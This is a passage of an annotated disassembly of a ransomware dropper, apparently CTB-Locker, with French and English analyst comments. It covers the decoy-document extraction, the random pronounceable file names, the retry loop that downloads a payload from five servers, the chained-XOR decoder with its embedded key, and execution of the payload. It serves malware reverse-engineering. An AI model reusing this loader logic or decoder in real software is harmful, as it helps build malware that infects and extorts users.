.text:004015BB 3B F7                             cmp     esi, edi
.text:004015BD 75 0A                             jnz     short loc_4015C9
.text:004015BF 68 E8 03 00 00                    push    3E8h
.text:004015C4
.text:004015C4                   EndProcessWithError:                    ; CODE XREF: start+110j
.text:004015C4                                                           ; start+197j ...
.text:004015C4 E8 B6 03 00 00                    call    ErrorMsgBox     ; ===========================> On sort !
.text:004015C9                   ; ---------------------------------------------------------------------------
.text:004015C9
.text:004015C9                   loc_4015C9:                             ; CODE XREF: start+DDj
.text:004015C9 56                                push    esi             ; hResInfo
.text:004015CA 57                                push    edi             ; lpModuleName
.text:004015CB FF 15 40 10 40 00                 call    GetModuleHandleA
.text:004015D1 50                                push    eax             ; hModule
.text:004015D2 FF 15 08 10 40 00                 call    LoadResource
.text:004015D8 EB 0D                             jmp     short loc_4015E7
.text:004015DA                   ; ---------------------------------------------------------------------------
.text:004015DA
.text:004015DA                   loc_4015DA:                             ; CODE XREF: start+C3j
.text:004015DA 50                                push    eax             ; hResInfo
.text:004015DB FF 75 08                          push    [ebp+hModule]   ; hModule
.text:004015DE FF 15 08 10 40 00                 call    LoadResource
.text:004015E4 8B 75 F8                          mov     esi, [ebp+lpBuffer]
.text:004015E7
.text:004015E7                   loc_4015E7:                             ; CODE XREF: start+F8j
.text:004015E7 3B C7                             cmp     eax, edi
.text:004015E9 75 07                             jnz     short loc_4015F2
.text:004015EB 68 E9 03 00 00                    push    3E9h
.text:004015F0 EB D2                             jmp     short EndProcessWithError
.text:004015F2                   ; ---------------------------------------------------------------------------
.text:004015F2
.text:004015F2                   loc_4015F2:                             ; CODE XREF: start+109j
.text:004015F2 50                                push    eax             ; hResData
.text:004015F3 FF 15 3C 10 40 00                 call    LockResource
.text:004015F9 56                                push    esi             ; hResInfo
.text:004015FA 57                                push    edi             ; hModule
.text:004015FB 89 45 F8                          mov     [ebp+lpBuffer], eax ; On recupere le contenu du fichier .CAB a créer
.text:004015FE FF 15 18 10 40 00                 call    SizeofResource
.text:00401604 FF 35 D8 1E 40 00                 push    lpMemBlock2     ; lpBuffer
.text:0040160A 89 45 FC                          mov     [ebp+dwMilliseconds], eax
.text:0040160D 53                                push    ebx             ; nBufferLength
.text:0040160E FF 15 28 10 40 00                 call    GetTempPathW
.text:00401614 57                                push    edi
.text:00401615 8D 85 B4 FD FF FF                 lea     eax, [ebp+var_24C]
.text:0040161B 6A 09                             push    9
.text:0040161D 50                                push    eax
.text:0040161E E8 98 01 00 00                    call    BuildCredibleFileName
.text:00401623 8D 85 B4 FD FF FF                 lea     eax, [ebp+var_24C]
.text:00401629 50                                push    eax
.text:0040162A FF 35 D8 1E 40 00                 push    lpMemBlock2
.text:00401630 BB FF 00 00 00                    mov     ebx, 0FFh
.text:00401635 68 D0 11 40 00                    push    offset aSS      ; "%s%s"
.text:0040163A 8D 85 B4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:00401640 53                                push    ebx
.text:00401641 50                                push    eax
.text:00401642 FF 15 FC 1E 40 00                 call    lpfwnsprintfW
.text:00401648 83 C4 20                          add     esp, 20h
.text:0040164B 57                                push    edi             ; hTemplateFile
.text:0040164C 68 80 00 00 00                    push    80h             ; dwFlagsAndAttributes
.text:00401651 6A 02                             push    2               ; dwCreationDisposition
.text:00401653 57                                push    edi             ; lpSecurityAttributes
.text:00401654 6A 01                             push    1               ; dwShareMode
.text:00401656 68 00 00 00 40                    push    40000000h       ; dwDesiredAccess
.text:0040165B 8D 85 B4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:00401661 50                                push    eax             ; lpFileName
.text:00401662 89 7D F0                          mov     [ebp+NumberOfBytesWritten], edi
.text:00401665 FF 15 20 10 40 00                 call    CreateFileW
.text:0040166B 8B F0                             mov     esi, eax
.text:0040166D 83 FE FF                          cmp     esi, 0FFFFFFFFh
.text:00401670 75 0A                             jnz     short loc_40167C
.text:00401672 68 EA 03 00 00                    push    3EAh
.text:00401677 E9 48 FF FF FF                    jmp     EndProcessWithError
.text:0040167C                   ; ---------------------------------------------------------------------------
.text:0040167C
.text:0040167C                   loc_40167C:                             ; CODE XREF: start+190j
.text:0040167C 57                                push    edi             ; lpOverlapped
.text:0040167D 8D 45 F0                          lea     eax, [ebp+NumberOfBytesWritten]
.text:00401680 50                                push    eax             ; lpNumberOfBytesWritten
.text:00401681 FF 75 FC                          push    [ebp+dwMilliseconds] ; nNumberOfBytesToWrite
.text:00401684 FF 75 F8                          push    [ebp+lpBuffer]  ; lpBuffer
.text:00401687 56                                push    esi             ; hFile
.text:00401688 FF 15 10 10 40 00                 call    WriteFile
.text:0040168E 56                                push    esi             ; hObject
.text:0040168F FF 15 48 10 40 00                 call    CloseHandle     ; =======> Le fichier CAB est créé sous locals settings\temp dans le profil de l'utilisateur
.text:00401695 8B 45 FC                          mov     eax, [ebp+dwMilliseconds]
.text:00401698 39 45 F0                          cmp     [ebp+NumberOfBytesWritten], eax
.text:0040169B 74 0A                             jz      short loc_4016A7
.text:0040169D 68 EB 03 00 00                    push    3EBh
.text:004016A2 E9 1D FF FF FF                    jmp     EndProcessWithError
.text:004016A7                   ; ---------------------------------------------------------------------------
.text:004016A7
.text:004016A7                   loc_4016A7:                             ; CODE XREF: start+1BBj
.text:004016A7 53                                push    ebx             ; nSize
.text:004016A8 8D 85 B4 F5 FF FF                 lea     eax, [ebp+Filename]
.text:004016AE 50                                push    eax             ; lpFilename
.text:004016AF 57                                push    edi             ; hModule
.text:004016B0 FF 15 1C 10 40 00                 call    GetModuleFileNameW ; Va chercher le nom de fichier de l'exécutable en cours (le malware donc)
.text:004016B0                                                           ; sera utilisé pour fabriquer certains noms de fichiers ensuite (celui du .CAB)
.text:004016B6 3B C7                             cmp     eax, edi
.text:004016B8 75 0A                             jnz     short loc_4016C4
.text:004016BA 68 EC 03 00 00                    push    3ECh
.text:004016BF E9 00 FF FF FF                    jmp     EndProcessWithError
.text:004016C4                   ; ---------------------------------------------------------------------------
.text:004016C4
.text:004016C4                   loc_4016C4:                             ; CODE XREF: start+1D8j
.text:004016C4 8B C8                             mov     ecx, eax
.text:004016C6 8D 85 B4 F5 FF FF                 lea     eax, [ebp+Filename]
.text:004016CC E8 E6 04 00 00                    call    sub_401BB7
.text:004016D1 85 C0                             test    eax, eax
.text:004016D3 75 0A                             jnz     short loc_4016DF
.text:004016D5 68 ED 03 00 00                    push    3EDh
.text:004016DA E9 E5 FE FF FF                    jmp     EndProcessWithError
.text:004016DF                   ; ---------------------------------------------------------------------------
.text:004016DF
.text:004016DF                   loc_4016DF:                             ; CODE XREF: start+1F3j
.text:004016DF 57                                push    edi
.text:004016E0 68 FC 1A 40 00                    push    offset CallBackFileCAB
.text:004016E5 57                                push    edi
.text:004016E6 8D 85 B4 F9 FF FF                 lea     eax, [ebp+FileName]
.text:004016EC 50                                push    eax
.text:004016ED FF 15 F0 1E 40 00                 call    lpfSetupIterateCabinetW ; On va regarder ce qu'il y a dans le .CAB, récupérer le nom du fichier qu'il contient et extraire le fichier
.text:004016F3 85 C0                             test    eax, eax
.text:004016F5 75 0A                             jnz     short loc_401701
.text:004016F7 68 EE 03 00 00                    push    3EEh
.text:004016FC E9 C3 FE FF FF                    jmp     EndProcessWithError
.text:00401701                   ; ---------------------------------------------------------------------------
.text:00401701
.text:00401701                   loc_401701:                             ; CODE XREF: start+215j
.text:00401701 6A 0A                             push    0Ah
.text:00401703 57                                push    edi
.text:00401704 57                                push    edi
.text:00401705 FF 35 EC 1E 40 00                 push    lpMemBlock3     ; lpMemBlock3 contient le chemin complet et le nom du fichier contenu dans le .CAB avec la bonne extension, mais le nom du .cab (malware.rtf)
.text:0040170B 57                                push    edi
.text:0040170C 57                                push    edi
.text:0040170D FF 15 DC 1E 40 00                 call    lpfShellExecuteW ; On va lancer le fichier. En l'occurrence cela va provoquer l'affichage du .rtf
.text:00401713 8D 45 BC                          lea     eax, [ebp+Name]
.text:00401716 50                                push    eax             ; lpName
.text:00401717 57                                push    edi             ; bInitialOwner
.text:00401718 57                                push    edi             ; lpMutexAttributes
.text:00401719 FF 15 44 10 40 00                 call    CreateMutexA    ; On crée un mutex pour être certain de n'exister qu'à une seule occurence
.text:0040171F FF 15 2C 10 40 00                 call    GetLastError
.text:00401725 3D B7 00 00 00                    cmp     eax, 0B7h       ; Si le mutex existe déjà (0x0B7 => ERROR_ALREADY_EXISTS) c'est qu'une autre occurence de CTB_Locker tourne, dans ce cas on sort...
.text:0040172A 75 07                             jnz     short loc_401733
.text:0040172C
.text:0040172C                   endOfProcess:                           ; CODE XREF: start+2D6j
.text:0040172C 57                                push    edi             ; uExitCode
.text:0040172D FF 15 00 10 40 00                 call    ExitProcess
.text:00401733                   ; ---------------------------------------------------------------------------
.text:00401733
.text:00401733                   loc_401733:                             ; CODE XREF: start+24Aj
.text:00401733 68 90 D0 03 00                    push    3D090h          ; 250 000ms, soit 250 secondes ou 4 minutes et 10 secondes
.text:00401738 B8 D0 DD 06 00                    mov     eax, 6DDD0h     ; 450 000ms, soit 450 secondes ou 7 minutes 30 secondes
.text:0040173D E8 5F 01 00 00                    call    randomizeEAX
.text:00401742 59                                pop     ecx
.text:00401743 50                                push    eax             ; dwMilliseconds
.text:00401744 FF 15 14 10 40 00                 call    Sleep           ; On dort quelques temps (282 secondes par exemple)...
.text:0040174A BB 88 13 00 00                    mov     ebx, 1388h
.text:0040174F 89 7D F4                          mov     [ebp+var_C], edi
.text:00401752 89 5D FC                          mov     [ebp+dwMilliseconds], ebx
.text:00401755
.text:00401755                   loc_401755:                             ; CODE XREF: start+2C2j
.text:00401755 8D 45 F8                          lea     eax, [ebp+lpBuffer]
.text:00401758 50                                push    eax             ; int
.text:00401759 8B 45 F4                          mov     eax, [ebp+var_C]
.text:0040175C FF 74 C5 C8                       push    [ebp+eax*8+lpString] ; lpString = un des noms de fichiers à télécharger (cf 0x401060)
.text:00401760 E8 A8 04 00 00                    call    downloadPayload ; ==> On va downloader la charge !
.text:00401765 8B F0                             mov     esi, eax        ; EAX = nb d'octets lus
.text:00401767 59                                pop     ecx
.text:00401768 59                                pop     ecx
.text:00401769 3B F7                             cmp     esi, edi
.text:0040176B 74 19                             jz      short loc_401786
.text:0040176D 8B 4D F8                          mov     ecx, [ebp+lpBuffer]
.text:00401770 E8 52 01 00 00                    call    dechiffreEtVerifiePayload ; ==> On va déchiffrer et contrôler la charge
.text:00401775 85 C0                             test    eax, eax
.text:00401777 75 2B                             jnz     short loc_4017A4
.text:00401779 68 00 80 00 00                    push    8000h           ; dwFreeType
.text:0040177E 57                                push    edi             ; dwSize
.text:0040177F 56                                push    esi             ; lpAddress
.text:00401780 FF 15 0C 10 40 00                 call    VirtualFree     ; On libère la mémoire allouée pour le payload
.text:00401786
.text:00401786                   loc_401786:                             ; CODE XREF: start+28Bj
.text:00401786 FF 45 F4                          inc     [ebp+var_C]     ; Si on a pas épuisé les 5 possibilités, on va tenter sur le serveur suivant...
.text:00401789 83 7D F4 05                       cmp     [ebp+var_C], 5
.text:0040178D 75 0A                             jnz     short loc_401799
.text:0040178F 01 5D FC                          add     [ebp-4], ebx    ; Si on a épuisé les 5 serveurs, on s'endort quelques temps avant de ré-essayer...
.text:00401792 C7 45 F4 01 00 00+                mov     [ebp+var_C], 1
.text:00401799
.text:00401799                   loc_401799:                             ; CODE XREF: start+2ADj
.text:00401799 FF 75 FC                          push    [ebp+dwMilliseconds] ; dwMilliseconds
.text:0040179C FF 15 14 10 40 00                 call    Sleep
.text:004017A2 EB B1                             jmp     short loc_401755 ; ...et on ré-essaye les 5 serveurs donc.
.text:004017A4                   ; ---------------------------------------------------------------------------
.text:004017A4
.text:004017A4                   loc_4017A4:                             ; CODE XREF: start+297j
.text:004017A4 8B 45 F8                          mov     eax, [ebp+lpBuffer]
.text:004017A7 83 C0 F8                          add     eax, 0FFFFFFF8h
.text:004017AA 50                                push    eax             ; nNumberOfBytesToWrite
.text:004017AB 83 C6 08                          add     esi, 8
.text:004017AE 56                                push    esi             ; lpBuffer
.text:004017AF E8 FF 05 00 00                    call    executePayload  ; ==> On va exécuter la charge downloadée plus haut
.text:004017B4 59                                pop     ecx
.text:004017B5 59                                pop     ecx
.text:004017B6 E9 71 FF FF FF                    jmp     endOfProcess    ; =================> On a terminé !
.text:004017B6                   start           endp
.text:004017B6
.text:004017BB
.text:004017BB                   ; =============== S U B R O U T I N E =======================================
.text:004017BB
.text:004017BB                   ; Attributes: bp-based frame
.text:004017BB
.text:004017BB                   ; void __cdecl BuildCredibleFileName(WCHAR *out, int maxLen, int fixedExt)
.text:004017BB                   ;
.text:004017BB                   ; Writes a random, pronounceable "<name>.<ext>" wide string into out:
.text:004017BB                   ;   <name> = 3..maxLen WCHARs (length picked by randomizeEAX, so maxLen
.text:004017BB                   ;            is assumed >= 3), a consonant at even positions and a vowel
.text:004017BB                   ;            at odd positions, drawn from the two alphabet strings copied
.text:004017BB                   ;            onto the stack below;
.text:004017BB                   ;   '.'    = element 6 of the vowel string ("aeoiuy.");
.text:004017BB                   ;   <ext>  = 3 WCHARs from the concatenated extension table: the entry at
.text:004017BB                   ;            WCHAR offset 69h (entry index 35) when fixedExt == 1,
.text:004017BB                   ;            otherwise entry rand(0..22h), i.e. one of the first 35.
.text:004017BB                   ; In:   arg_0 = out, arg_4 = maxLen, arg_8 = fixedExt
.text:004017BB                   ; Out:  out[] NUL-terminated; eax = 0.  Caller pops the 3 args (plain retn).
.text:004017BB                   ; Saves ebx/esi/edi; ecx, edx and flags are not preserved.
.text:004017BB                   ; Notes: out is never bounds-checked (needs maxLen + 5 WCHARs);
.text:004017BB                   ;        the movsd/movsw copy at the end relies on DF = 0;
.text:004017BB                   ;        randomizeEAX takes max in eax and min as a stack argument.
.text:004017BB                   BuildCredibleFileName proc near         ; CODE XREF: start+13Ep
.text:004017BB                                                           ; executePayload+16p
.text:004017BB
.text:004017BB                   var_618         = byte ptr -618h
.text:004017BB                   var_410         = word ptr -410h
.text:004017BB                   var_208         = word ptr -208h
.text:004017BB                   var_1FC         = word ptr -1FCh
.text:004017BB                   arg_0           = dword ptr  8
.text:004017BB                   arg_4           = dword ptr  0Ch
.text:004017BB                   arg_8           = dword ptr  10h
.text:004017BB
.text:004017BB 55                                push    ebp
.text:004017BC 8B EC                             mov     ebp, esp
.text:004017BE 81 EC 18 06 00 00                 sub     esp, 618h       ; three 104h-WCHAR alphabet buffers
.text:004017C4 53                                push    ebx
.text:004017C5 56                                push    esi
.text:004017C6 57                                push    edi
.text:004017C7 68 DC 11 40 00                    push    offset aAeoiuy_ ; "aeoiuy."
.text:004017CC BE 04 01 00 00                    mov     esi, 104h       ; buffer size passed to the three wnsprintfW calls
.text:004017D1 8D 85 F8 FD FF FF                 lea     eax, [ebp+var_208]
.text:004017D7 56                                push    esi
.text:004017D8 50                                push    eax
.text:004017D9 FF 15 FC 1E 40 00                 call    lpfwnsprintfW   ; var_208 = L"aeoiuy." (vowels; element 6 is '.')
.text:004017DF 68 EC 11 40 00                    push    offset aQwrtpsdfghjklz ; "qwrtpsdfghjklzxcvbnm"
.text:004017E4 8D 85 F0 FB FF FF                 lea     eax, [ebp+var_410]
.text:004017EA 56                                push    esi
.text:004017EB 50                                push    eax
.text:004017EC FF 15 FC 1E 40 00                 call    lpfwnsprintfW   ; var_410 = the 20 consonants
.text:004017F2 68 18 12 40 00                    push    offset aTxtrtfdocchmhl ; "txtrtfdocchmhlpttfpdffb2xlspptmdbcdawav"...
.text:004017F7 8D 85 E8 F9 FF FF                 lea     eax, [ebp+var_618]
.text:004017FD 56                                push    esi
.text:004017FE 50                                push    eax
.text:004017FF FF 15 FC 1E 40 00                 call    lpfwnsprintfW   ; var_618 = extension table, 3 WCHARs per entry
.text:00401805 8B 45 0C                          mov     eax, [ebp+arg_4] ; max = maxLen
.text:00401808 6A 03                             push    3               ; min = 3
.text:0040180A E8 92 00 00 00                    call    randomizeEAX
.text:0040180F 8B F0                             mov     esi, eax        ; esi = name length in [3, maxLen]
.text:00401811 33 FF                             xor     edi, edi        ; edi = 0, reused as the "min" argument below
.text:00401813 83 C4 28                          add     esp, 28h        ; pop 3 x 3 wnsprintfW args + 1 randomizeEAX arg
.text:00401816 33 DB                             xor     ebx, ebx        ; ebx = i = 0 (output index)
.text:00401818 3B F7                             cmp     esi, edi
.text:0040181A 7E 40                             jle     short loc_40185C ; length <= 0 (signed): emit no name characters
.text:0040181C
.text:0040181C                   loc_40181C:                             ; CODE XREF: BuildCredibleFileName+9Fj
.text:0040181C 8B C3                             mov     eax, ebx
.text:0040181E 25 01 00 00 80                    and     eax, 80000001h  ; eax = i % 2 (signed-remainder idiom); ZF = (i even)
.text:00401823 79 05                             jns     short loc_40182A
.text:00401825 48                                dec     eax             ; negative-i fix-up; not reached, i counts up from 0
.text:00401826 83 C8 FE                          or      eax, 0FFFFFFFEh
.text:00401829 40                                inc     eax
.text:0040182A
.text:0040182A                   loc_40182A:                             ; CODE XREF: BuildCredibleFileName+68j
.text:0040182A 57                                push    edi             ; min = 0 (push leaves ZF intact)
.text:0040182B 74 12                             jz      short loc_40183F ; even i -> consonant
.text:0040182D 6A 05                             push    5
.text:0040182F 58                                pop     eax             ; max = 5: index 0..5 of "aeoiuy.", never the '.'
.text:00401830 E8 6C 00 00 00                    call    randomizeEAX
.text:00401835 66 8B 84 45 F8 FD+                mov     ax, [ebp+eax*2+var_208] ; ax = random vowel
.text:0040183D EB 10                             jmp     short loc_40184F
.text:0040183F                   ; ---------------------------------------------------------------------------
.text:0040183F
.text:0040183F                   loc_40183F:                             ; CODE XREF: BuildCredibleFileName+70j
.text:0040183F 6A 13                             push    13h
.text:00401841 58                                pop     eax             ; max = 13h: index 0..19 of the 20 consonants
.text:00401842 E8 5A 00 00 00                    call    randomizeEAX
.text:00401847 66 8B 84 45 F0 FB+                mov     ax, [ebp+eax*2+var_410] ; ax = random consonant
.text:0040184F
.text:0040184F                   loc_40184F:                             ; CODE XREF: BuildCredibleFileName+82j
.text:0040184F 59                                pop     ecx             ; discard the "min" argument
.text:00401850 8B 4D 08                          mov     ecx, [ebp+arg_0]
.text:00401853 66 89 04 59                       mov     [ecx+ebx*2], ax ; out[i] = ax
.text:00401857 43                                inc     ebx
.text:00401858 3B DE                             cmp     ebx, esi
.text:0040185A 7C C0                             jl      short loc_40181C ; while (++i < length), signed
.text:0040185C
.text:0040185C                   loc_40185C:                             ; CODE XREF: BuildCredibleFileName+5Fj
.text:0040185C 66 8B 85 04 FE FF+                mov     ax, [ebp+var_1FC] ; var_208[6] == '.'
.text:00401863 8B 75 08                          mov     esi, [ebp+arg_0]
.text:00401866 66 89 04 5E                       mov     [esi+ebx*2], ax ; out[i] = '.'
.text:0040186A 43                                inc     ebx             ; i++
.text:0040186B 83 7D 10 01                       cmp     [ebp+arg_8], 1
.text:0040186F 75 05                             jnz     short loc_401876
.text:00401871 6A 69                             push    69h
.text:00401873 58                                pop     eax             ; fixedExt == 1: WCHAR offset 69h = entry 35 (just past the 35 random candidates)
.text:00401874 EB 0D                             jmp     short loc_401883
.text:00401876                   ; ---------------------------------------------------------------------------
.text:00401876
.text:00401876                   loc_401876:                             ; CODE XREF: BuildCredibleFileName+B4j
.text:00401876 57                                push    edi             ; min = 0
.text:00401877 6A 22                             push    22h
.text:00401879 58                                pop     eax             ; max = 22h -> entry index 0..34
.text:0040187A E8 22 00 00 00                    call    randomizeEAX
.text:0040187F 6B C0 03                          imul    eax, 3          ; entry index -> WCHAR offset (3 WCHARs per entry)
.text:00401882 59                                pop     ecx             ; discard the "min" argument
.text:00401883
.text:00401883                   loc_401883:                             ; CODE XREF: BuildCredibleFileName+B9j
.text:00401883 8B 4D 08                          mov     ecx, [ebp+arg_0]
.text:00401886 8D 3C 5E                          lea     edi, [esi+ebx*2] ; edi = &out[i]
.text:00401889 8D B4 45 E8 F9 FF+                lea     esi, [ebp+eax*2+var_618] ; esi = &extTable[offset]
.text:00401890 A5                                movsd                   ; copy 4 + 2 bytes = 3 WCHARs (forward, DF assumed clear)
.text:00401891 66 A5                             movsw
.text:00401893 83 C3 03                          add     ebx, 3          ; i += 3
.text:00401896 5F                                pop     edi
.text:00401897 33 C0                             xor     eax, eax
.text:00401899 5E                                pop     esi
.text:0040189A 66 89 04 59                       mov     [ecx+ebx*2], ax ; out[i] = L'\0'
.text:0040189E 5B                                pop     ebx
.text:0040189F C9                                leave
.text:004018A0 C3                                retn
.text:004018A0                   BuildCredibleFileName endp
.text:004018A0
.text:004018A1
.text:004018A1                   ; =============== S U B R O U T I N E =======================================
.text:004018A1
.text:004018A1                   ; Attributes: bp-based frame
.text:004018A1
.text:004018A1                   ; DWORD randomizeEAX(DWORD max /* in eax */, DWORD min /* arg_0 */)
.text:004018A1                   ; Returns min + r % (max - min + 1), r being a 32-bit value written by
.text:004018A1                   ; SystemFunction036 (advapi32's RtlGenRandom), i.e. a value in [min, max].
.text:004018A1                   ; In:   eax = max (register argument), arg_0 = min
.text:004018A1                   ; Out:  eax = result.  Plain retn: the caller pops arg_0 (callers in this
.text:004018A1                   ;       file do so with `pop ecx`).
.text:004018A1                   ; Saves esi; ecx, edx and flags are not preserved (edx = remainder on exit).
.text:004018A1                   ; Notes: the BOOLEAN returned by SystemFunction036 is overwritten without
.text:004018A1                   ;        being tested, so on failure r is whatever the stack slot held;
.text:004018A1                   ;        the division is unsigned, and max == min - 1 makes the divisor 0;
.text:004018A1                   ;        the modulo reduction is not bias-free (irrelevant for these ranges).
.text:004018A1                   randomizeEAX    proc near               ; CODE XREF: start+25Dp
.text:004018A1                                                           ; BuildCredibleFileName+4Fp ...
.text:004018A1
.text:004018A1                   lplNumber       = dword ptr -4
.text:004018A1                   arg_0           = dword ptr  8
.text:004018A1
.text:004018A1 55                                push    ebp
.text:004018A2 8B EC                             mov     ebp, esp
.text:004018A4 51                                push    ecx             ; reserve the 4-byte local lplNumber
.text:004018A5 56                                push    esi
.text:004018A6 8B F0                             mov     esi, eax        ; esi = max
.text:004018A8 6A 04                             push    4               ; RandomBufferLength
.text:004018AA 8D 45 FC                          lea     eax, [ebp+lplNumber]
.text:004018AD 50                                push    eax             ; RandomBuffer
.text:004018AE FF 15 04 1F 40 00                 call    lpfSystemFunction036 ; fills lplNumber with 4 random bytes; args are not popped here, leave discards them
.text:004018B4 2B 75 08                          sub     esi, [ebp+arg_0]
.text:004018B7 8B 45 FC                          mov     eax, [ebp+lplNumber] ; eax = r (the call's BOOLEAN result is dropped here)
.text:004018BA 46                                inc     esi             ; esi = max - min + 1
.text:004018BB 33 D2                             xor     edx, edx
.text:004018BD F7 F6                             div     esi             ; edx = r % (max - min + 1)
.text:004018BF 5E                                pop     esi             ; restore esi
.text:004018C0 8B C2                             mov     eax, edx
.text:004018C2 03 45 08                          add     eax, [ebp+arg_0] ; eax = min + remainder
.text:004018C5 C9                                leave
.text:004018C6 C3                                retn
.text:004018C6                   randomizeEAX    endp
.text:004018C6
.text:004018C7
.text:004018C7                   ; =============== S U B R O U T I N E =======================================
.text:004018C7
.text:004018C7                   ; int dechiffreEtVerifiePayload(BYTE *buf /* in eax */, DWORD len /* in ecx */)
.text:004018C7                   ; Decodes the downloaded blob in place and checks its integrity.
.text:004018C7                   ; In:   eax = pointer to the downloaded buffer; ecx = its size in bytes
.text:004018C7                   ;       (ecx is the length, not a pointer: see the cmp ecx / mov [eax] below).
.text:004018C7                   ; Layout expected at buf: [0..3] stored checksum, [4..7] payload length,
.text:004018C7                   ;       [8..] encoded payload.
.text:004018C7                   ; Out:  eax = 1 when len >= 400h (unsigned), payload length == len - 8 and
.text:004018C7                   ;       computeChecksumPayload(decoded payload) == stored checksum; else 0.
.text:004018C7                   ;       On a checksum mismatch the payload has already been decoded in place.
.text:004018C7                   ; Saves ebx/esi/edi; ecx is modified and edx may be clobbered by the callees.
.text:004018C7                   ; Note: both the key (in dechiffrePayload) and the checksum routine live in
.text:004018C7                   ;       this binary, so this is an integrity check only, not authentication.
.text:004018C7
.text:004018C7                   dechiffreEtVerifiePayload proc near     ; CODE XREF: start+290p
.text:004018C7 81 F9 00 04 00 00                 cmp     ecx, 400h
.text:004018CD 73 03                             jnb     short loc_4018D2 ; blobs shorter than 400h bytes are rejected
.text:004018CF 33 C0                             xor     eax, eax
.text:004018D1 C3                                retn                    ; return 0
.text:004018D2                   ; ---------------------------------------------------------------------------
.text:004018D2
.text:004018D2                   loc_4018D2:                             ; CODE XREF: dechiffreEtVerifiePayload+6j
.text:004018D2 53                                push    ebx
.text:004018D3 8B 18                             mov     ebx, [eax]      ; ebx = stored checksum (header dword 0)
.text:004018D5 56                                push    esi
.text:004018D6 8B 70 04                          mov     esi, [eax+4]    ; esi = declared payload length (header dword 1)
.text:004018D9 83 C1 F8                          add     ecx, 0FFFFFFF8h ; ecx = len - 8 (bytes after the header)
.text:004018DC 3B F1                             cmp     esi, ecx
.text:004018DE 74 04                             jz      short loc_4018E4 ; declared length must match exactly
.text:004018E0 33 C0                             xor     eax, eax
.text:004018E2 EB 1D                             jmp     short loc_401901 ; return 0
.text:004018E4                   ; ---------------------------------------------------------------------------
.text:004018E4
.text:004018E4                   loc_4018E4:                             ; CODE XREF: dechiffreEtVerifiePayload+17j
.text:004018E4 57                                push    edi
.text:004018E5 8D 78 08                          lea     edi, [eax+8]    ; edi = start of the payload
.text:004018E8 56                                push    esi             ; lNbBytesToDo
.text:004018E9 57                                push    edi             ; lpBuffer
.text:004018EA E8 15 00 00 00                    call    dechiffrePayload ; in-place decode
.text:004018EF 56                                push    esi
.text:004018F0 57                                push    edi
.text:004018F1 E8 8A 05 00 00                    call    computeChecksumPayload ; eax = checksum of the decoded payload
.text:004018F6 2B C3                             sub     eax, ebx        ; eax = computed - stored
.text:004018F8 83 C4 10                          add     esp, 10h        ; pop the 2 x 2 cdecl args
.text:004018FB F7 D8                             neg     eax             ; CF = (eax != 0)
.text:004018FD 1B C0                             sbb     eax, eax        ; eax = -CF
.text:004018FF 40                                inc     eax             ; eax = (computed == stored) ? 1 : 0
.text:00401900 5F                                pop     edi
.text:00401901
.text:00401901                   loc_401901:                             ; CODE XREF: dechiffreEtVerifiePayload+1Bj
.text:00401901 5E                                pop     esi
.text:00401902 5B                                pop     ebx
.text:00401903 C3                                retn
.text:00401903                   dechiffreEtVerifiePayload endp
.text:00401903
.text:00401904
.text:00401904                   ; =============== S U B R O U T I N E =======================================
.text:00401904
.text:00401904                   ; Attributes: bp-based frame
.text:00401904
.text:00401904                   ; void __cdecl dechiffrePayload(BYTE *lpBuffer, DWORD lNbBytesToDo)
.text:00401904                   ; In-place XOR decoding with a 16-byte key that is overwritten by the
.text:00401904                   ; encoded bytes as it goes:
.text:00401904                   ;   for (i = 0, j = 0; i < n; i++) {
.text:00401904                   ;       k = key[j];  key[j] = buf[i];  buf[i] ^= k;
.text:00401904                   ;       if (++j == 16) j = 0;
.text:00401904                   ;   }
.text:00401904                   ; so buf[i] is XORed with the constant key for i < 16 and with the original
.text:00401904                   ; (encoded) byte buf[i-16] afterwards -- a chained XOR whose initial block
.text:00401904                   ; is the 16-byte constant stored by the mov instructions below.
.text:00401904                   ; In:   lpBuffer = data to decode, lNbBytesToDo = byte count (unsigned; 0 = no-op)
.text:00401904                   ; Out:  lpBuffer decoded in place; eax carries no meaningful result.
.text:00401904                   ; Saves ebx/edi/esi; eax, ecx, edx and flags are not preserved.
.text:00401904
.text:00401904                   dechiffrePayload proc near              ; CODE XREF: dechiffreEtVerifiePayload+23p
.text:00401904
.text:00401904                   var_10          = byte ptr -10h
.text:00401904                   var_F           = byte ptr -0Fh
.text:00401904                   var_E           = byte ptr -0Eh
.text:00401904                   var_D           = byte ptr -0Dh
.text:00401904                   var_C           = byte ptr -0Ch
.text:00401904                   var_B           = byte ptr -0Bh
.text:00401904                   var_A           = byte ptr -0Ah
.text:00401904                   var_9           = byte ptr -9
.text:00401904                   var_8           = byte ptr -8
.text:00401904                   var_7           = byte ptr -7
.text:00401904                   var_6           = byte ptr -6
.text:00401904                   var_5           = byte ptr -5
.text:00401904                   var_4           = byte ptr -4
.text:00401904                   var_3           = byte ptr -3
.text:00401904                   var_2           = byte ptr -2
.text:00401904                   var_1           = byte ptr -1
.text:00401904                   lpBuffer        = dword ptr  8
.text:00401904                   lNbBytesToDo    = dword ptr  0Ch
.text:00401904
.text:00401904 55                                push    ebp
.text:00401905 8B EC                             mov     ebp, esp
.text:00401907 83 EC 10                          sub     esp, 10h        ; room for the 16-byte key table (var_10..var_1)
.text:0040190A 53                                push    ebx
.text:0040190B 57                                push    edi
.text:0040190C 33 DB                             xor     ebx, ebx        ; i = 0 (byte index)
.text:0040190E 33 FF                             xor     edi, edi        ; j = 0 (key index)
.text:00401910 C6 45 F0 80                       mov     [ebp+var_10], 80h ; BYTE keyTable[16] = {0x80, 0x3B, 0xD3, 0x23, 0x9C, 0xE5, 0x1A, 0xBA, 0xD2, 0x93, 0x64, 0x21, 0x0B, 0xD6, 0x0B, 0x19}; -- constant embedded in the code
.text:00401914 C6 45 F1 3B                       mov     [ebp+var_F], 3Bh
.text:00401918 C6 45 F2 D3                       mov     [ebp+var_E], 0D3h
.text:0040191C C6 45 F3 23                       mov     [ebp+var_D], 23h
.text:00401920 C6 45 F4 9C                       mov     [ebp+var_C], 9Ch
.text:00401924 C6 45 F5 E5                       mov     [ebp+var_B], 0E5h
.text:00401928 C6 45 F6 1A                       mov     [ebp+var_A], 1Ah
.text:0040192C C6 45 F7 BA                       mov     [ebp+var_9], 0BAh
.text:00401930 C6 45 F8 D2                       mov     [ebp+var_8], 0D2h
.text:00401934 C6 45 F9 93                       mov     [ebp+var_7], 93h
.text:00401938 C6 45 FA 64                       mov     [ebp+var_6], 64h
